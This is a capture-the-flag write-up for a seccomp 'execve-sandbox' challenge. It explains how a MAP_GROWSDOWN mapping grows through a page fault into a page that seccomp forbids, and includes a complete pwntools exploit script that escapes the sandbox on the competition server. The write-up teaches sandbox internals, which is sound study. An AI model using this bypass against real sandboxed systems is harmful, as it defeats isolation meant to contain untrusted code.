What a kewl sandbox! Seccomp makes it impossible to execute ./flag

nc execve-sandbox.ctfcompetition.com 1337


283 points, 23 Solves, pwn

We are given the source to a sandbox that reads an ELF64 binary, initializes the sandbox, then runs the sandboxed program. It first checks that none of the ELF sections lie within the range 0x10000-0x11000, then uses seccomp to allow only a few safe syscalls.
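As an illustration of the first check, here is a minimal Python 3 sketch. It assumes the sandbox walks the ELF64 section header table, as the description suggests. The function names `section_ranges` and `touches_forbidden_page` are hypothetical. The real sandbox is written in C and may read the headers differently.

```python
import struct

FORBIDDEN_LO = 0x10000  # mmap_min_addr on the challenge box
FORBIDDEN_HI = 0x11000  # mmap_min_addr + PAGE_SIZE


def section_ranges(elf):
    """Return (sh_addr, sh_size) for every section header of a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:  # e_ident[EI_CLASS] must be ELFCLASS64
        raise ValueError("not an ELF64 file")
    # Elf64_Ehdr fields that follow the 16-byte e_ident array.
    (_type, _machine, _version, _entry, _phoff, shoff, _flags,
     _ehsize, _phentsize, _phnum, shentsize, shnum, _shstrndx) = struct.unpack_from(
        "<HHIQQQIHHHHHH", elf, 16)
    ranges = []
    for i in range(shnum):
        # Elf64_Shdr: sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, ...
        fields = struct.unpack_from("<IIQQQQIIQQ", elf, shoff + i * shentsize)
        ranges.append((fields[3], fields[5]))
    return ranges


def touches_forbidden_page(elf, lo=FORBIDDEN_LO, hi=FORBIDDEN_HI):
    """True if any section's [addr, addr + size) overlaps [lo, hi)."""
    return any(addr < hi and addr + size > lo for addr, size in section_ranges(elf))
```

Any binary whose sections all live outside that window passes. The page at 0x10000 therefore has to be created at run time. The seccomp side of the setup is the sandbox's install_syscall_filter: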

static int install_syscall_filter(unsigned long mmap_min_addr)
{
  int allowed_syscall[] = {
    SCMP_SYS(rt_sigreturn), SCMP_SYS(rt_sigaction), SCMP_SYS(rt_sigprocmask), SCMP_SYS(sigreturn),
    SCMP_SYS(exit_group), SCMP_SYS(exit), SCMP_SYS(brk), SCMP_SYS(access), SCMP_SYS(fstat), SCMP_SYS(write),
    SCMP_SYS(close), SCMP_SYS(mprotect), SCMP_SYS(arch_prctl), SCMP_SYS(munmap), SCMP_SYS(fstat),
    SCMP_SYS(readlink), SCMP_SYS(uname),
  };
  scmp_filter_ctx ctx;
  unsigned int i;
  int ret;

  /* any syscall not explicitly allowed below kills the process */
  ctx = seccomp_init(SCMP_ACT_KILL);
  if (ctx == NULL) {
    return -1;
  }

  for (i = 0; i < sizeof(allowed_syscall) / sizeof(int); i++) {
    if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, allowed_syscall[i], 0) != 0) {
      ret = -1;
      goto out;
    }
  }

  /* prevent mmap to map mmap_min_addr */
  if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mmap), 1,
                       SCMP_A0(SCMP_CMP_GE, mmap_min_addr + PAGE_SIZE)) != 0) {
    ret = -1;
    goto out;
  }

  /* first execve argument (filename) must be mapped at mmap_min_addr */
  if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(execve), 1,
                       SCMP_A0(SCMP_CMP_EQ, mmap_min_addr)) != 0) {
    ret = -1;
    goto out;
  }

  puts("[*] seccomp-bpf filters installed");

  ret = seccomp_load(ctx);
  if (ret != 0)
    ret = -1;

out:
  seccomp_release(ctx);
  return ret;
}

It also allows execve, but only if the first argument (the filename pointer) is exactly 0x10000 (mmap_min_addr), and allows mmap only if the requested address is at least 0x11000 (mmap_min_addr + PAGE_SIZE).
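To make the two argument checks concrete, here is a small Python 3 model of the filter's decisions. It assumes mmap_min_addr is 0x10000 and pages are 4 KiB, as on the challenge box. `filter_allows` is a hypothetical helper that mirrors the rules above; it is not part of libseccomp's API.

```python
MMAP_MIN_ADDR = 0x10000
PAGE_SIZE = 0x1000

# Syscalls allowed with no argument checks (names from allowed_syscall[] above).
UNCONDITIONAL = {
    "rt_sigreturn", "rt_sigaction", "rt_sigprocmask", "sigreturn",
    "exit_group", "exit", "brk", "access", "fstat", "write",
    "close", "mprotect", "arch_prctl", "munmap", "readlink", "uname",
}


def filter_allows(name, arg0=0, mmap_min_addr=MMAP_MIN_ADDR):
    """Return True if the modelled filter lets syscall `name` with first argument `arg0` through."""
    if name in UNCONDITIONAL:
        return True
    if name == "mmap":
        # SCMP_A0(SCMP_CMP_GE, mmap_min_addr + PAGE_SIZE)
        return arg0 >= mmap_min_addr + PAGE_SIZE
    if name == "execve":
        # SCMP_A0(SCMP_CMP_EQ, mmap_min_addr): the filename pointer must be exactly this address
        return arg0 == mmap_min_addr
    return False  # default action of seccomp_init(SCMP_ACT_KILL)
```

One consequence of the mmap rule is that even `mmap(NULL, ...)` is killed, because 0 is below the bound. Every mapping has to request an explicit address of at least 0x11000.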

The end goal is to run the flag program in the current directory, but since 0x10000 isn’t mapped and seccomp won’t let us mmap it, this seems impossible.

After a bit of reading I came across MAP_GROWSDOWN, which I’d previously only used for creating fake stacks, and realised that it could be used to defeat the sandbox!

From the mmap man page:


This flag is used for stacks. It indicates to the kernel virtual memory system that the mapping should extend downward in memory. The return address is one page lower than the memory area that is actually created in the process’s virtual address space. Touching an address in the “guard” page below the mapping will cause the mapping to grow by a page. This growth can be repeated until the mapping grows to within a page of the high end of the next lower mapping, at which point touching the “guard” page will result in a SIGSEGV signal.

I was interested in how this was actually handled by the kernel, and tracing through __do_page_fault in arch/x86/mm/fault.c we come to:

if (!(vma->vm_flags & VM_GROWSDOWN)) {
    bad_area(regs, error_code, address);
    return;
}
if (error_code & PF_USER) {
    /* accesses far below the user stack pointer are treated as bugs */
    if (address + 65536 + 32 * sizeof(unsigned long) < regs->sp) {
        bad_area(regs, error_code, address);
        return;
    }
}
if (expand_stack(vma, address)) {
    bad_area(regs, error_code, address);
    return;
}

So as long as the mapping has VM_GROWSDOWN set (which MAP_GROWSDOWN gives us) and the stack pointer is at most 65536 + 32 * 8 = 0x10100 bytes above the faulting address, expand_stack is called. It in turn calls expand_downwards to extend the mapping down to the page containing that address.
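The arithmetic in that condition is easy to get wrong. Here is a Python 3 sketch of the three checks quoted above. It assumes x86-64 (sizeof(unsigned long) == 8), 4 KiB pages, and a user-mode fault that lands just below a VMA. The function names are hypothetical. The real expand_downwards also applies further checks that are not modelled here, such as the mmap_min_addr check via security_mmap_addr and resource limits.

```python
SIZEOF_UNSIGNED_LONG = 8                          # x86-64
STACK_SLACK = 65536 + 32 * SIZEOF_UNSIGNED_LONG   # 0x10100
PAGE_MASK = ~0xFFF                                # 4 KiB pages


def fault_reaches_expand_stack(address, sp, vm_growsdown=True, user_mode=True):
    """Mirror the three checks quoted from __do_page_fault for a fault below a VMA."""
    if not vm_growsdown:
        return False  # bad_area(): the VMA is not a grows-down mapping
    if user_mode and address + STACK_SLACK < sp:
        return False  # bad_area(): access is too far below the stack pointer
    return True       # expand_stack(vma, address) is attempted


def grown_vma_start(address):
    """expand_downwards() moves vm_start down to the page containing the fault."""
    return address & PAGE_MASK
```

For the exploit's push, `fault_reaches_expand_stack(0x10ff8, sp=0x11000)` is True and `grown_vma_start(0x10ff8)` is 0x10000.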

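We just map a page at 0x11000 with MAP_GROWSDOWN set (allowed, since 0x11000 >= 0x11000), point rsp at 0x11000 and push something. The push faults at 0x10ff8, just below the mapping, so the kernel automatically grows it by a page and the stack mapping now spans 0x10000-0x12000. Because this growth happens in the page-fault handler rather than through a syscall, seccomp never gets a say. We can now write ./flag to 0x10000 and call execve.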
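The whole sequence can be traced address by address. This Python 3 simulation assumes the x86-64 Linux values of the PROT_* and MAP_* constants and mmap_min_addr = 0x10000. It models only the single grows-down mapping, and the class name is hypothetical; it does not perform real memory management.

```python
# x86-64 Linux values of the flags used by the exploit.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS, MAP_GROWSDOWN = 0x02, 0x20, 0x100
PAGE_SIZE = 0x1000
MMAP_MIN_ADDR = 0x10000


class GrowsDownMapping:
    """One anonymous MAP_GROWSDOWN mapping covering [start, end); nothing else is mapped."""

    def __init__(self, addr, length):
        # The seccomp rule only allows mmap when addr >= mmap_min_addr + PAGE_SIZE.
        if addr < MMAP_MIN_ADDR + PAGE_SIZE:
            raise PermissionError("seccomp would kill mmap(%#x)" % addr)
        self.start, self.end = addr, addr + length

    def touch(self, addr, sp):
        """Simulate a user-mode access at addr while the stack pointer is sp."""
        if self.start <= addr < self.end:
            return  # already mapped
        if addr >= self.end or addr + 65536 + 32 * 8 < sp:
            raise MemoryError("SIGSEGV at %#x" % addr)
        new_start = addr & ~(PAGE_SIZE - 1)
        if new_start < MMAP_MIN_ADDR:
            raise MemoryError("SIGSEGV: %#x is below mmap_min_addr" % new_start)
        # Growth happens in the page-fault handler, not via a syscall, so seccomp never sees it.
        self.start = new_start


prot = PROT_READ | PROT_WRITE | PROT_EXEC
flags = MAP_GROWSDOWN | MAP_ANONYMOUS | MAP_PRIVATE
stack = GrowsDownMapping(0x11000, 0x1000)  # mmap(0x11000, 0x1000, prot, flags, 0, 0)
rsp = 0x11000                              # mov rsp, 0x11000
stack.touch(rsp - 8, sp=rsp)               # push faults at 0x10ff8 before rsp changes
rsp -= 8
stack.touch(0x10000, sp=rsp)               # writing "./flag" to 0x10000 now succeeds
execve_filename = stack.start              # execve(0x10000, ...) matches SCMP_CMP_EQ
print(hex(prot), hex(flags), hex(stack.start), hex(stack.end))  # prints: 0x7 0x122 0x10000 0x12000
```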

Using all the amazing helper functions of pwntools, this turns out to be pretty simple:

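#!/usr/bin/env python2
import sys
from pwn import *

def exploit():
  code = ""
  # mmap(0x11000, 0x1000, RWX, MAP_GROWSDOWN|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0):
  # allowed by seccomp because 0x11000 >= mmap_min_addr + PAGE_SIZE
  code += shellcraft.syscall('SYS_mmap', 0x11000, 0x1000,
    constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
    constants.MAP_GROWSDOWN | constants.MAP_ANONYMOUS | constants.MAP_PRIVATE,
    0, 0)
  # point the stack at the bottom of the mapping; the push below faults just
  # under it and the kernel grows the mapping down to 0x10000
  code += "mov rsp, 0x11000\n"
  code += shellcraft.pushstr("./flag")
  # the grown page is fresh and zero-filled, so the copied string stays NUL-terminated
  code += shellcraft.memcpy(0x10000, 'rsp', 6)
  # the filename pointer is exactly mmap_min_addr, as the execve rule requires
  code += shellcraft.syscall('SYS_execve', 0x10000, 0, 0)
  code += shellcraft.exit(0)

  elf = make_elf(asm(code), extract=True, strip=True)

  # pad the binary to one page before sending it to the sandbox
  payload = elf.ljust(0x1000, "\x00")
  p.sendafter("binary...", payload)

  print p.recvall()

if __name__ == "__main__":
  name = "./execve-sandbox"
  binary = ELF(name)

  context.terminal = ["tmux", "sp", "-h"]
  context.arch = "amd64"
  context.os = "linux"

  if len(sys.argv) > 1:
    p = remote("execve-sandbox.ctfcompetition.com", 1337)
  else:
    p = process(name, cwd="./sandbox", env={})
    gdb.attach(p, """
      set follow-fork-mode child
    """)

  exploit()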

Running it prints the flag: CTF{Time_to_read_that_underrated_Large_Memory_Management_Vulnerabilities_paper}